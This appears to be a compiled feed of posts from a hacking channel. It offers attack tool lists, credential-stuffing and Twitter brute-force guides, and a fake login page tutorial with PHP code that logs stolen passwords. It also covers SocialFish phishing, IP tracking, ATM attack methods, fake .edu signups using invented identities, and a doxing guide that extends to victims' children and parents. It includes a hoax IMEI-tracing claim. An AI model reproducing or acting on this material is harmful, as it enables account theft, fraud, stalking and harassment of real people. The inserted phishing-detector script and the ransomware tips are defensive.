The BiGsec Community

⚔️ 🛡️

MITM: 
➤ SSLstrip ( https://github.com/moxie0/sslstrip )
➤ Ettercap ( https://www.ettercap-project.org )
➤ Driftnet ( https://github.com/deiv/driftnet )
➤ DSniff (  https://sectools.org/tool/dsniff/ )

SQL Injection:
➤ SQLMAP ( https://github.com/sqlmapproject/sqlmap )
➤ Uniscan ( https://github.com/poerschke/Uniscan )
➤  W3af ( https://github.com/andresriancho/w3af/ )
➤ Nikto ( https://github.com/sullo/nikto )

Viruses (backdoors, nothing special here):
➤ Metasploit ( https://github.com/rapid7/metasploit-framework )
➤ Shellter ( https://www.shellterproject.com )

Cracking:
➤ John the ripper ( https://www.openwall.com/john/ )
➤ Hydra ( https://sectools.org/tool/hydra/ )
➤ Aircrack ( https://www.aircrack-ng.org )

DDoS tools:

We have a few shells that support stressing, nothing special. And I can recommend:
➤ TorsHammer ( https://github.com/dotfighter/torshammer )
➤ GoldenEye ( https://github.com/jseidl/GoldenEye )
➤ Hping3 ( hping.org )
➤ Pyloris ( https://motoma.io/pyloris/ )
➤ HULK ( https://github.com/grafov/hulk )
➤ Blacknurse ( https://github.com/opsxcq/exploit-blacknurse )

XSS:
➤ BeEF ( https://beefproject.com )

Info-gathering/portscanners:
➤ Nmap ( https://nmap.org/download-html )
➤ Zenmap ( https://nmap.org/zenmap/ )

Viruses/RATs, general backdoors:
➤ Thefatrat ( https://github.com/Screetsec/TheFatRat )
➤ Nanocore ( No Download Available Find Manually )

Other Tools:
➤ Commix ( https://github.com/commixproject/commix )
➤ Wifite ( https://github.com/derv82/wifite2 )
➤ Ghostphisher ( https://github.com/savio-code/ghost-phisher )





Enjoy! Follow us for more...

Unlimited Gmail Accounts creator

| You dont have to create them anymore 🔥

1) First of all you will need one gmail account

2) Then go to the site https://thebot.net/api/gmail/ and put that account name there without @gmail.com

3) Just press "Generate" and you will get Thousands of Accounts

4) They are all Connected with your first account so you just have to use  your first one  for all the accounts

So if I send a mail to any of these accounts you will receive it on your inbox of the first account.

Enjoy 👍❤️


Edu Mail Creator Bot

🔰🔰

🌀Python Programmed Bot
🌀Check Edu Mail Benefits In The Link

Edu Mail Benefits:
Amazon Prime Account
The Washington Post Premium Account
The Newyork Times Account
Apple iPhone Discounts for Students
Adobe Creative Cloud
Spotify Account
MS office 365
Github Developer Student Account
Get Huge Discounts on Cell Phone Plans
Get Google Drive Storage Account

Instructions To Run The Program:
1. Open CMD
2. Set Path Where Run_me.py Is (cd C:….)
3. Type In CMD: python run_me.py
4. Accounts Are Stored In “accountinfo.txt”

Link: https://anonfile.com/P90cH5u6od/edu_mail_rar
Password: 777




How to Crack Accounts ? - Basics for Noobs

🔰

#Most_Requested_Topic

This is how to crack accounts for people who are literally noobs, meaning that you have no idea what cracking is and how it works.
This would've been something I wished I had when I started out cracking.

Basically what cracking is, it's taking combolists, and running them through a program to check if that info is valid.
You usually want to use proxies so your IP doesn't get banned Combolists: It's a txt file full of emails and passwords, in the format emailass
Proxies: The "gateway" between you and the internet.
Basically use this so your IP doesn't get banned.
Checkers: These are the checkers you use to check the combolist.

🔰Steps of Cracking:🔰

1. Get a combolist
2. Get a checker for whatever account you want to crack
3. Get proxies
4. Load combolists and proxies into the checker

5. Press start Your checker should now start checking each email from different proxies to see if it's a valide combo for that service You use proxies since the company, let's say Disney again, will ban your IP for logging in too many times.
The proxy makes it so it seems like your logging in from different locations each time.

Beware cracking is ILLEGAL.
But the risk is very low.
Cracking is unethical.
Anyway, have fun!




How To Make A Fake Login Page To Steal Password

🔥  🔥

I WONT BE RESPONSIBLE WHAT U DO WITH IT

Hello this is a tutorial on how to make a fake login page.

Before we start I want to say that I did not make this guide and am simply sharing it here.

1- open up the site that you want to make the fake page from it, after the load right click and save the page as “web page complete”

2- now open that page with notepad, and press control+F to access search bar, and then search “login”

3- behind the word “login” it’s written .action, we don’t need those so delete everything behind the login (this tutorial is for PHP, may you see login.aspx)

4- if you saw method=”post” change it to method=”GET”   

5- ok now save it as .html

6- open a new notepad, and write this commands on it:<?php

header (‘Location:target.com’);

$handle = fopen(“log.txt”, “a”);

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle , $value );
fwrite($handle, “\r\n”);

}

fwrite($handle, “\r\n”);

fclose($handle);

exit;

?>

7- instead of Location: target.com, write your login page address!

8- now save this as Login.PHP

9- go to website’s that offer free hosts

000Webhost.com

https://www.awardspace.com/

https://infinityfree.net/

10- make an account, get your host and upload both of files!

11- after that you only need to give your HTML link to your victim!

12- if he opened and write his Login information you can access it!

13- if you look at PHP source, you can see log.txt that’s where your victim info’s saved.

This Post is just for raising your information, and I do not accept responsibility for your misuse.                                           
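
Steps 1 to 4 leave marks that a defender triaging a reported page can check for: the "saved from url" comment that browsers such as Chrome write into a page saved as complete, naming the site the copy was taken from, and a password field submitted by GET. The following is an added example, not part of the original post; the class name, finding labels, hostnames and sample page are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: a saved copy of a login page, hosted somewhere else.
SAMPLE_PAGE = """\
<!-- saved from url=(0026)https://login.example.com/ -->
<html><body>
<form action="login.php" method="GET">
  <input type="text" name="user">
  <input type="password" name="pass">
</form>
</body></html>
"""


class LoginFormAudit(HTMLParser):
    """Collects phishing-copy indicators from one HTML document."""

    def __init__(self, page_url):
        super().__init__()
        self.page_host = urlsplit(page_url).hostname
        self.findings = []
        self._form = None  # state of the <form> currently open, if any

    def handle_comment(self, data):
        # Saved pages carry: <!-- saved from url=(NNNN)https://origin/... -->
        m = re.match(r"\s*saved from url=\(\d+\)(\S+)", data)
        if m:
            origin = urlsplit(m.group(1)).hostname
            # A copy served from a different host than it was saved from.
            if origin and origin != self.page_host:
                self.findings.append(f"copied-from:{origin}")

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # HTML forms default to GET when no method attribute is present.
            method = (a.get("method") or "get").lower()
            self._form = {"method": method, "password": False}
        elif tag == "input" and self._form is not None:
            if (a.get("type") or "").lower() == "password":
                self._form["password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            # Legitimate login forms POST; GET puts the password in the URL.
            if self._form["password"] and self._form["method"] == "get":
                self.findings.append("password-sent-by-get")
            self._form = None


def audit(html_text, page_url):
    """Return the list of indicators found in html_text served at page_url."""
    parser = LoginFormAudit(page_url)
    parser.feed(html_text)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_PAGE, "https://free-host.example.net/index.html"):
        print(finding)
```
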




HOW TO TRACE A MISSING OR STOLEN PHONE ?

🔰🔰
◽◽◽◽◽◽◽◽◽◽
If you lose your #mobile phone, you can #trace it without going to the police.
➖➖➖➖➖➖➖➖➖➖
Most of us always fear that our phones may be #stolen at any time.
➖➖➖➖➖➖➖➖➖➖
Each phone carries a unique
#IMEI no. i.e. International Mobile Equipment Identity No which can be used to track it anywhere in the world.

This is how it works:
➖➖➖➖➖➖➖➖➖➖
1. Dial \*#06# from your mobile.
➖➖➖➖➖➖➖➖➖➖
2. Your mobile phone shows a unique 15 digit.
➖➖➖➖➖➖➖➖➖➖
3. Note down this number at a secure place except in your mobile phone itself as this is the #number which will help trace your phone in case of theft.
➖➖➖➖➖➖➖➖➖➖
4. Once stolen, just E-mail this 15 digit IMEI No. to cop@vsnl.net with details as stated below:

Your name:
Address:
Phone model:\_
Make:\_
Last used No.:\_
E-mail for communication:\_
Missed date:\_
IMEI No :\_
➖➖➖➖➖➖➖➖➖➖
5.Your Mobile will be #traced within next 24 hours via a complex system of GPRS and internet, You will find where your hand set is being operated and the new user's No. will be sent to your #email.
➖➖➖➖➖➖➖➖➖➖
6. After this, you can inform the Police with the details you got.





GET PERSONAL NUMBER FOR RECEIVING SMS

⚠️

1. Twilio.com
2. Textnow.com
3. Countrycode.org
4. Wp.pinger.com
5. Textmagic.com
6. Esendex.co.uk - (It's easy to get a trial period using a virtual number by fast registration, the package includes 25 free messages, the restriction of use in 7 days.No credit card is required.You can be counted for a personal number!)
7. Burstsms.com.au - (Similar service as the previous one, fast registration, the probe includes 14 days You do not need a credit card, so you can count as a personal number!)
8. Directsms.com.au - (You register, you get a free 30-day trial version Business sms. Personal Wirth.number!)
9. Vumber.com - (Register, receive a 14-day trial version.) Personal

PUBLIC NUMBER FOR RECEIVING SMS➖

1. Receive-sms-online.info
2. Receivefreesms.net
3. Sms-receive.net
4 . Receive-a-sms.com
5. Hs3x.com
6. Receive-sms-now.com - (There are Russian numbers)
7. Smsreceivefree.com
8. Receivesmsonline.com
9. Getsms.org - (Рус.номера)
10. Tempsms.ru - (Rus.number)
11. Numberforsms.com - (There are Russian numbers)
12. Sonetel.com
13. Smska.us - (Rus.number)
14. Sellaite.com
15. Sms.ink - (Rus.numera)
16. Proovl.com
17. Onlinesim.ru
18. Zadarma.com - (There are Russian numbers)
19. Smsc.ru - (You need to register, there are Russian and Ukrainian numbers)
20. Freevirtualnumber.skycallbd.com
21. Getfreesmsnumber.com
22. Receive-smsonline.net - Yearly design 
23. Receivefreesms.com
24. Receivesmsverification.com
25 Sms-online.co
26. Ireceivesmsonline.com
27. Receive-sms-online.com - (There are a number of scores)
28. Receive-sms-free.com
29. Esendex.com.au - (Registration required)
30. Receivesmsonline .in
31. Mytrashmobile.com
32. Receivesmsonline.me
33. Anon-sms.com
34. Mfreesms.com
35. Spryng.nl - (You need to register)
36. Smsreceiveonline.com
37. Smsget.net - (Megaphone and Beeline)





How to Track Anyone by Sending Them a Message ?

💢💢 🔰

1) Go to Grabify and make your account there by clicking on register.

2) Get the link (URL) of anything you want to send like  wallpaper, music, video, etc.

3) Now login to Grabify.

4) After login in to Grabify, go to home page. There you will see a box where you can paste url. So, paste the copied url in that box and click on create url.

5) After this, URL will be created and you will be redirected to the page where you will see new URLs.

6) Now copy the newly generated URL or google URL (anyone) and send it to that person whom you want to track. You can use any social media platform like Facebook, Whatsapp, Telegram or you can send directly to their phones as a sms.

Okay so here we have got the IP Address of the user whom we wanted to trace. Now let's get some more information about him/her.

So, to get information about user, copy the IP address of that person and go to IP2Location and paste IP address there.

So, now just copy the Longitude and Latitude of the user that you got in the previous step and search it on Google, you will get map location.






Install socialfish in termux.

To install SocialFish we will need to

pkg install python

pkg install php

pkg install curl

pkg install git

pkg install unzip

pkg install wget


Or use this command

pkg install python php curl git unzip

Then we download the tool from Github

git clone https://github.com/UndeadSec/SocialFish.git

Then we open the tool file
cd SocialFish

Then we use it
chmod + x *


Then

pip install -r requirements.txt

To open the tool we use

python SocialFish.py


Wait for download ngrok

After downloading the tool opens, choose the command y

Then put your mail option n / y you are free to do so

Choose the letter s and choose the page you want to create on any website

Type an example Facebook link
URL: https://www.facebook.com


It will give you a fake link that looks just like Facebook. Deceive your friends or whoever you want to hack your account
Explanation of installing the tool and making a false link to Facebook
I do not allow the source to change





Cracker Hash Online

🔘  🔘

https://crackstation.net/
http://crypo.in.ua/tools/
http://www.md5decrypter.co.uk/
http://www.md5this.com/index.php
http://md5hack.com/
http://www.miraclesalad.com/webtools/md5.php
http://hash.online-convert.com/md5-generator
http://md5decryption.com/
http://www.netmd5crack.com/cracker/
http://www.md5decrypter.com/
https://isc.sans.edu/tools/reversehash.html
http://www.md5crack.com/
http://md5.web-max.ca/
http://www.md5.net/
http://www.cmd5.org/
http://md5pass.info/
http://md5.darkbyte.ru/
http://www.tydal.nu/article/md5-crack
http://tools.benramsey.com/md5/
http://www.xmd5.org/index_en.htm
http://www.hash-cracker.com/
http://www.md5.cz/
http://www.md5decryption.com/
http://www.adamek.biz/md5-generator.php
http://www.whatsmyip.org/hash-generator/
http://www.hashemall.com/
www.hashgenerator.de
http://blog.faultylabs.com/?d=md5
http://www.xorbin.com/tools/md5-hash-calculator
https://www.functions-online.com/md5.html
http://md5.com.cn/
http://tools.benramsey.com/md5/
http://www.cmd5.org/
http://www.crypo.com/
https://www.freerainbowtables.com/de/hashcracking/
http://www.insidepro.com/hashes.php?lang=rus
http://www.md5.com.cn/
http://md5cracker.org/
http://hashkiller.co.nf/
http://hashkiller.co.nf/mail.php
http://www.onlinehashcrack.com





HOW TO CREATE UNLIMITED INSTAGRAM ACCOUNTS ?

🤳🖼️ **🖼️🤳

*INSTALLATION*

*1) Clone the code repo*

 git clone https://github.com/kaex/Insta-mass-account-creator.git

*2) Navigate to the code repo*

cd Insta-mass-account-creator

*3) Run the damn script*

php start.php -l 5 -p proxies.txt

🤳 This script creates accounts with random name and username gets by the web. All user created are older 18 years

🤳 This script helps you follow multiple accounts with the account's you've created

⚠️ *Important*⚠️

After ~ 1-24 hours new fake Instagram account with an unverified phone number  cannot do any requests. All requests will be redirected to the page
https://instagram.com/challenge.



BEST DEEPWEB HACKING FORUM

🐠🌐 ** 🌐🐠

Most of below forums are online 24/7 however sometimes TOR servers can get offline for various reasons.

*ASSUMPTIONS*

✔ You have TOR browser
✔ You spoofed MAC, changed hostname, cleared temp files etc. For android change IMEI , Android ID etc etc
✔ You know what you are looking for


⚠ *Do not run programs you from anyone. Scan them first and run them in a sandbox environment*


http://2gxxzwnj52jutais.onion/phpbb/index.php – Onion Forum 2.0 renewed
http://3fyb44wdhnd2ghhl.onion/ib/ – Onii-Chan
http://bx7zrcsebkma7ids.onion – Jisko
http://npdaaf3s3f2xrmlo.onion/ – Twitter clone
http://jv7aqstbyhd5hqki.onion – HackBB – Hacking & cracking forum
http://xdagknwjc7aaytzh.onion/20/http/1.4.7.9/forummain.htm – Read only access to the Freenet FMS forums via the Anonet Webproxy
http://sbforumaz7v3v6my.onion/ – SciBay Forums
http://kpmp444tubeirwan.onion/ – DeepWeb
http://r5c2ch4h5rogigqi.onion/ – StaTorsNet
http://hbjw7wjeoltskhol.onion – The BEST tor social network! File sharing, messaging and much more. Use a fake email to register.
http://t4is3dhdc2jd4yhw.onion/ – OnionForum 3.0 – New Onionforum for general talk, now with marketplace
http://zw3crggtadila2sg.onion/imageboard/ – TorChan – One of the oldest chans on Tor.

Stay safe and have fun😊




Bruteforce Twitter 🐦 Account


TweetShell allows you to hack an account by bruteforcing it.

 Its multi-threaded which means it's more fast than those single threaded tools out there.

💡 *For Noobs: Bruterforce is type of attack that tries to guess credentials by submitting all possible values. Its not limited to credentials only, it can be used to bypass WAFS, IDS and IPS, it can be used to find vulnerabilities. 😉*

*INSTALLATION*

*0) Install requirements*

pkg  install curl tsudo

*1) Clone the tool*

git clone https://github.com/thelinuxchoice/tweetshell

*2) Navigate to tweetshell directory*

cd tweetshell

*3) Change some permissions*

chmod +x tweetshell.sh

*4) Run the dam script*

sudo ./tweetshell.sh






How to create free .edu email ?


 *PART 1:*📖

🐾Step 1:

Go to this https://www.apply.vccs.edu/Home/Sign_In/Logon.aspx and solve captcha. Then Click on new user and then sign up with email.

🐾 Step 2:

To fill the detail you can use your real name and email but if you are not an US citizen then you can use this (https://www.fakeaddressgenerator.com/usa_address_generator) to generate fake user detail. [For temporary email you can go https://emailfake.com/.] For Eg:

Full Name  Mary N Morey
Gender  female
Title  Mrs.
Race  Black
Birthday  11/16/1957
Social Security Number  306-90-8491


💡 *Note: Save name, username and password in notepad or somewhere it may need later*

🐾 Step 3:

After filling all the detail click on submit.

Now that you have created account lets move on to part two of this tutorial.

*PART 2:*📖

After creating account and loging  into click on Apply Now. Select any college name from the list and click on Apply. A pop-up will open then click on Apply Now (OR CONTINUE APPLICATION) BUTTON. Then you are asked for different questions. You can answer these questions randomly or you can use the detail below to answer these questions.

First name and last name: Put the name that you have entered in part 1. Leave other field empty.

Birthdate, Social Security Number: Enter details which was generated from this https://www.fakeaddressgenerator.com/usa_address_generator .

Gender: Male/Female (as you like)

Racial or ethnic identification: White

Hispanico or Latino : No

Have you ever applied, attended …… : No

After that click on Save and Continue.

For Mailing address use the detail generated from  this link.

Is this your permanent address: Yes

You can leave telephone number blank.

Then check on I have reviewed the guidelines box and click on save and continue.

Which …..  high school education: I don’t have a GED/High …….

Last date attended: 01/2017

Highest grade completed: 11th grade.

Have you ever attend …. : No

I have planned to earn a degree…..: No

I plan to start class: Choose any

After that click on Save and Continue.

Have you ever served …….. military: No

Are you …….. military: No

After that click on Save and Continue.

Parent 1 and 2: Choose any.

What is your current status?: Native US……

Primary spoken language: English

Do you want……: No

After that click on Submit your completed application.

*PART 3* 📖

After successfully completing the application put on your signature i.e your full name. Then you will be redirect to with all your detail. Under the student information you will get your username and temporary password. Note down that password, username and other details.

After that you can go

If link not open try later then works because this anonymously https://bit.ly/38wwKJc and login where you will get your .edu email.

💡 *Note: It will take more than 6hours for the login credentials to activate. So you will get error that your username and password is invalid*







Tips To Help Protect Your Devices Against Ransomware Attacks

━━━━━━━━━━━━━
Install and use trusted security software on all your devices, including your mobile phone.

Keep your security software up to date. It can help protect your devices against cyberattacks.

Update your operating system and other software. This can patch security vulnerabilities.

Avoid reflexively opening email attachments. Why? Email is one of the principal methods for delivering ransomware. 

Be wary of any email attachment that advises you to enable macros to view its content. If you enable macros, macro malware can infect multiple files.

Back up your data to an external hard drive. If you’re the victim of a ransomware attack, you’ll likely be able to restore your files once the malware has been cleaned up.

Consider utilizing cloud services. This can help mitigate a ransomware infection, since many cloud services retain previous versions of files, allowing you to “roll back” to the unencrypted form.

Don’t pay the ransom. You could pay a ransom in hopes of getting your files back — but you might not get them back. There’s no guarantee the cybercriminal will release your data.

Encryption is essential to help protect your sensitive personal information. But in the case of ransomware attacks, it can be used against you. It’s smart to take steps to help you gain the benefits and avoid the harm.
━━━━━━━━━━━━━

BEST METHODES FOR HACKING ATM


1)  fake processing center :

>This method can be used if an attacker is able to access the cable that connects the cashier to the network. A hacker disconnects the ATM from the bank's network and then connects it to a device that acts as a fake processing center.

>The cashier is used to control the withdrawal of cash and sends commands to the cashier requesting that money be withdrawn from the selected tray. Voila! The attacker can use any card or enter any PIN code, the false transaction would seem legitimate.

2) remote attack on several ATMs

> In this method an infiltrate is needed to work in the bank. The offender remotely obtains (acquires) a key used to open the cashier's rack. Although this key does not allow the attacker to access the withdrawal of money, the network cable would be exposed. The hacker disconnects the ATM from the bank's network and connects a special device that sends all the data to its own server.

> Often, the network to which you connect to the ATM is not segmented and the ATMs themselves may be misconfigured. In this case, with this device, a hacker could compromise several ATMs at once, even if the malicious device is only connected to one of them.

>The rest of the attack is carried out as we have explained before. A fake processing center is installed on the server and the attacker gains full control over the cashier. Using any card, the culprit can withdraw money from the cashier, regardless of the model

3) Black Box Attack

> As in the method described above, the attacker obtains the key from the cashier's frame and puts the machine into maintenance mode. Then, the hacker connects the so-called black box to the exposed USB port. A black box is a device that allows the hacker to control the cash drawer.

> While the criminal alters the cashier, the screen shows a message that says "in maintenance" or "out of service", although, in reality, it is possible to get money from it. In addition, the black box can be controlled wirelessly with a  smartphone .

> The hacker only has to press a button on the screen to withdraw the cash and get rid of the black box to hide the evidence.

4)  malware attack

> There are two ways to infect a cashier with malware : inserting a USB device with malware (that means having the key to open the cashier's rack) or infecting the machine remotely, all after having compromised the bank's network.

> If the cashier is not protected against malware and does not use whitelists, a hacker can have the malware send commands to the cashier and sell money. The attack could be repeated until the cashier's money runs out.




HOW TO ACCESS ROOT IN TERMUX WITHOUT ROOT ?




Open Termux on your Android device and type: apt update && apt upgrade

Now install wget: apt install wget -y

Now install proot: apt install proot -y

Install git: apt install git -y

Now clone the repository: git clone https://github.com/MFDGaming/ubuntu-in-termux.git

Now type: cd ubuntu-in-termux

Now type: chmod +x *

Run the script: ./ubuntu.sh -y

Now just start Ubuntu: ./startubuntu.sh

Now you can see that root@localhost has appeared. This is the proot-emulated root user inside the Ubuntu guest; it does not give root on the Android device itself.








What is Scareware ?

Scareware:
Scareware is a type of malware designed to trick victims into purchasing and downloading useless and potentially dangerous software.

Scareware, which generates pop-ups that resemble Windows system messages, usually purports to be antivirus or antispyware software, a firewall application or a registry cleaner. The messages typically say that a large number of problems -- such as infected files -- have been found on the computer and the user is prompted to purchase software to fix the problems. In reality, no problems were detected and the suggested software purchase may actually contain real malware. If the user falls for the scam, he will lose the money he paid for the useless software and he may also make his computer unusable. Frequently, the message window has a clickjacking feature that takes the user to the attacker's Web site or initiates a malware download if the user clicks "Cancel" or the "X" to close the window.


Stay tuned for more such information.

Basic Doxing Tutorial

You've probably seen verious people such as political members, FBI, CIA, police officers and other scrubs on the internet that have been d0xed.

The power a d0x has is great, people usually dont know what its actually capable of. They underestimate them greatly.
D0xing is in some way, an art. The art of investigation and finding loads of personal information just through the internet.
You can find anything you want, if you know where to look. The victim will be spammed with phone calls, pizza bombs, emails, texts,
DDoS attacks, ect.

What you'll need: 🧿

1️⃣ Internet Connection (Obvs, a good proxy or a VPN would be a good idea if you got one.)

2️⃣ Google Chrome or Mozilla Firefox (Faster and better security than IE, I personally use MFF.)

3️⃣ Notepad or paper (If you like typing, use notepad.)

4️⃣ Pastebin.com Account (To share the d0x with the world!)

5️⃣ A good reason (Don't just d0x some n00b for fun, a good reason is better. Like a political figure, abusive cop, or someone that is blackmailing, just something that people will frown upon.)

6️⃣ A good group of d0xerz (Optional, but very useful. Good communication is key here.)

7️⃣ Patience (Proper d0xes take time, could be an hour to a few days.)


Useful Websites: 🕸

- www.google.com (obvs, its always a good place to start.)

- www.facebook.com (If they have it, add them, save some of their pictures and save all
of their info and where they work.)

- www.namechk.com (To see if the persons username is taken on a wide veriety of websites.)

- www.pipl.com (Like google, but it will hide most of the crap you'll get from google.)

- www.spokeo.com (A premium account will be the best for you.)

- www.whois.org (If they own any websites, look em up.)

- www.zabasearch.com/ (No Success with Whitepages? Try this.)

- www.zoominfo.com/(Professional career and employment.)

- wink.com/ (Another people search.)

- www.freeality.com (Name, city, and state.)

- www.infospace.com/ (Companies by name, category, or city.)

- www.isearch.com (Phone Books.)

- www.whitepages.com/find_neighbors (Need to confirm d0x? Calling neighbors and asking for the target.
They tell you how you can reach them.)

- www.411.com/ (Source for free people and business searches in the US and Canada.)

- infobel.com (Links to almost every phonebook in the world.)

- http://com.lullar.com/ (A profile searcher for social networking sites.)

- http://www.checkusernames.com/ (Check to see if a username has been used on over 9000 websites.)

- http://www.ip2location.com/ (Accurate!)

- http://www.paterva.com/web5/ (It provides excellent results when e-mail addresses and full names are used.)

- http://www.archive.org/index.php (Find deleted webpages.)

- https://www.iplocation.net (Find the IP of a protected site.)

-  http://exif.regex.info/exif.cgi (EXIF data searcher.)

Once you have the basics, like their name and what town they live in, you then could
search up their towns whitepages, then search their name and there you go! You got their address and their landline!

Facebook is also a great place to look, it usually has where they work, there family members, email addresses, phone numbers, ect.
You can also take a look through their pictures too, maybe they'll have a pic of their car? Now you know what they drive! Also, look for pictures of anything that could be used against them. Pictures of them drinking/smoking (if their underage).

If you found out where they work, you can go onto the employers website and snag thier work number,
email and sometimes even their cell phone number.

Run a quick search on google.com or pipl.com with their email, it then could lead to XBL or PSN gamertags, which then could lead to friends and IP addresses. You can get IP address on Xbox LIVE with a program called Cain & Abel. Here's a youtube tut how to do it.
http://www.youtube.com/watch?v=e19D9E3e0b0

You can get someones IP address just trough email. Just email them and wit for a replay, when you get a reply.
You got their IP (Assuming they arent using a VPN). Im not going to tell you on here, so heres a linky: http://aruljohn.com/info/howtofindipaddress/

If you know the the victim personally, it will be much easier to d0x them, ovbs.


Proper d0x format:
------------------
If you can find out everything about your victim, post it.
Put their basic info first.

Name:
Sex:
Eye Color:
Hair COlor:
Weight:
Height:
Age:
Date of Birth: (AKA, DoB. Also usually posted in DD/MM/YYYY format.)
SSN: (If you know it, post it. But dont get caught!)
Religious Views:
Medical Condidtion(s):
Education:
Occupation:
Political Party:

Then put their basic contact info.

Country:
Region/City:
Address:
Timezone:
ZIP Code/Postal Code:
Home Phone #:
Work #:
Cell Phone #:
Cell Phone Carrier:

Then put their online info.

Screenname:
Eamil Addres(s):
IP Address:
ISP:
Connection Status:
Facebook Account:
MySpace Account:
Twitter Account:
Hi5 Account:
Nexopia Account:
Skype Account:
XBL/PSN:

Next, put their records (Criminal/Medical/Military Service of you know them.)

Criminal Record:
Medical Record:
Military Service:

If you want, you can put their childrens info,
But it will look bad on you!

Name:
Age:
DoB:

You can also put their parents info if you want them to be spammed too.

Fathers Name:
Marrige Status: (If they are divorced, mention it)
Counrty:
Region/City:
Address:
ZIP Code/Postal Code:
Home Phone #:
Cell Phone #:
Email Address:
Occupation:

Mothers Name:
Maiden Name:
Marrige Status:
Counrty:
Region/City:
Address:
ZIP Code/Postal Code:
Home Phone #:
Cell Phone #:
Email Address:
Occupation:

If you have any other info on your victim, feel free to post it.

Pets Name(s):
Favorite Food(s):
Best Friend(s):
Sexual Preferance:
Known Passwords:
Current Vehicle:
License Plate Number:
VIN Number:




Enumeration Tutorial

Top 44 Ports (Basics)

1️⃣ FTP - Port 21
2️⃣ SSH - Port 22
3️⃣ Telnet - Port 23
4️⃣ SMTP | Port 25 and Submission Port 587
5️⃣ DNS - Port 53
6️⃣ Finger - Port 79
7️⃣ HTTP - Port 80
8️⃣ Kerberos - Port 88
9️⃣ POP3 - Port 110
1️⃣0️⃣ RPCInfo - Port 111
1️⃣1️⃣ Ident - Port 113
1️⃣2️⃣ NetBios
1️⃣3️⃣ SNMP - Port 161
1️⃣4️⃣ Check Point FireWall-1 Topology - Port 264
1️⃣5️⃣ LDAP - Port 389
1️⃣6️⃣ SMB - Port 445
1️⃣7️⃣ Rexec - Port 512
1️⃣8️⃣ Rlogin - Port 513
1️⃣9️⃣ RSH - port 514
2️⃣0️⃣ AFP - Apple Filing Protocol - Port 548
2️⃣1️⃣ Microsoft Windows RPC Services | Port 135 and Microsoft RPC Services over HTTP | Port 593
2️⃣2️⃣ HTTPS - Port 443 and 8443
2️⃣3️⃣ RTSP - Port 554 and 8554
2️⃣4️⃣ Rsync - Port 873
2️⃣5️⃣ Java RMI - Port 1099
2️⃣6️⃣ MS-SQL | Port 1433
2️⃣7️⃣ Oracle - Port 1521
2️⃣8️⃣ NFS - Port 2049
2️⃣9️⃣ ISCSI - Port 3260
3️⃣0️⃣ SAP Router | Port 3299
3️⃣1️⃣ MySQL | Port 3306
3️⃣2️⃣ Postgresql - Port 5432
3️⃣3️⃣ HPDataProtector RCE - Port 5555
3️⃣4️⃣ VNC - Port 5900
3️⃣5️⃣ CouchDB - Port 5984
3️⃣6️⃣ Redis - Port 6379
3️⃣7️⃣ AJP Apache JServ Protocol - Port 8009
3️⃣8️⃣ PJL - Port 9100
3️⃣9️⃣ Apache Cassandra - Port 9160
4️⃣0️⃣ Network Data Management Protocol (ndmp) - Port 10000
4️⃣1️⃣ Memcache - Port 11211
4️⃣2️⃣ MongoDB - Port 27017 and Port 27018
4️⃣3️⃣ EthernetIP-TCP-UDP - Port 44818
4️⃣4️⃣ UDP BACNet - Port 47808

Perform A Ping sweep : 🧹
$ nmap -sP -PE -PP -PS21,22,23,25,80,113,31339 -PA80,113,443,10042 --source-port 53 -T4 <IP>

$ nmap -sP -PE -PP -PS21,22,23,25,80,113,31339 -PA80,113,443,10042 --source-port 53 -T4 192.168.0.1

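-sP = Ping scan (host discovery only, no port scan; named -sn in current Nmap)
-PE = ICMP echo request discovery probe
-PP = ICMP timestamp request discovery probe
-PS21,22.... = TCP SYN discovery probes to the given ports
-PA = TCP ACK discovery probes to the given ports
-T4 = Aggressive timing template (faster scan)
--source-port = source port the probes are sent from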

List 50000 random IPs (-sL only lists the targets, it sends no packets to them)
$ nmap -n -sL -iR 50000 -oN -

Scan Specific Target 🧿
$ nmap -v -n -PE -Pn <target>
-n = never do DNS resolution
-v = verbose output -vv is higher verbosity level
-PE = ICMP echo request discovery probe
-Pn = Skip host discovery and treat every target as online

$ nmap -v -n -PE -PO <target>
-PO = IP Protocol Ping

Scan Specific Ports 🔌
$ nmap -v -n -PS21-23,25,53,80,443,3389 -PO -PE -PM -PP <target>

$ nmap -sL 54.248.103.0/24 -oG -
-sL = List scan (lists the targets without scanning them)
-oG = Grepable output ("-" writes it to stdout)

Scan network with Firewall : 🔥🚧
$ nmap --script firewalk --traceroute <target> -vv

$ traceroute 192.168.20.2

$ hping -R 192.168.20.2 -V

TCP SYN/ACK, UDP or SCTP discovery to given ports
$ nmap -PS/PA/PU/PY

ICMP echo, timestamp, and netmask request discovery probes 🕔
$ nmap -PE/PP/PM

Never do DNS resolution/Always resolve [default: sometimes] 🚫
Never do DNS resolution  | -n
Always resolve | -R

Scan Techniques
1️⃣ TCP SYN scan -sS
2️⃣ Connect scan -sT
3️⃣ ACK scan -sA
4️⃣ Window scan -sW
5️⃣ Maimon scan -sM
6️⃣ UDP Scan -sU
7️⃣ TCP Null scan -sN
8️⃣ FIN scan -sF
9️⃣ Xmas scan -sX
1️⃣0️⃣ IP protocol scan -sO

Scan UDP ports with Nmap, e.g.:
$ nmap -sU -p U:53,161 <target>

Scan "number" most common ports
$ nmap -sS --top-ports "1000" <target>

More :
https://highon.coffee/blog/nmap-cheat-sheet/

This is a list of common ports that will give you a pretty good list of "alive" systems when scanning internally or externally.

📄 List of ports :
